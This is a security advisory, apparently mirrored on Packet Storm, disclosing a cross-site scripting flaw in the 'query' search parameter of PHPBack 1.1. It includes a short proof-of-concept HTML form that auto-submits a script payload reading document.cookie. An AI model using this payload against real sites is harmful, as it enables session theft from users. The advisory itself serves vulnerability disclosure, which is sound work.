what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PHPBack 1.1 Cross Site Scripting

PHPBack 1.1 Cross Site Scripting
Posted Dec 15, 2015
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

PHPBack version 1.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | cde593d1a57a48476453da138a2d1b632caff1e0b22e7d834c48c72ed75ed6c6
Download | Favorite | View

PHPBack 1.1 Cross Site Scripting

Change Mirror Download
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/PHPBACK-XSS.txt



Vendor:
====================
www.phpback.org



Product:
===============
phpback v1.1

The open source feedback system, PHPBack is feedback a web application that
you can easily
implement on your website. It gives your customers a way to communicate
their ideas to
improve your products.



Vulnerability Type:
==========================
Cross site scripting - XSS



CVE Reference:
==============
N/A



Vulnerability Details:
======================
XSS vulnerability exist in search field 'query' parameter allowing
arbitrary client side JS code
execution on victims who click our infected linx or visit our infected
webpage. Session ID theft
may follow as well as possibility to bypass CSRF protections etc...



XSS Exploit code(s):
===================

<form id='InFeCT0r' action="
http://localhost/phpback_v1.1/phpback-1.1c/home/search" method="POST">
<input name="query" type="hidden"
value="'<script>alert(document.cookie)</script>">
<script>document.getElementById('InFeCT0r').submit()</script>
</form>



Disclosure Timeline:
=====================
Vendor Notification: December 11, 2015
December 15, 2015  : Public Disclosure




Exploitation Technique:
=======================
Remote



Severity Level:
================
High




Description:
=====================================================
Request Method(s):              [+] POST


Vulnerable Product:             [+] phpback v1.1


Vulnerable Parameter(s):        [+] query



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close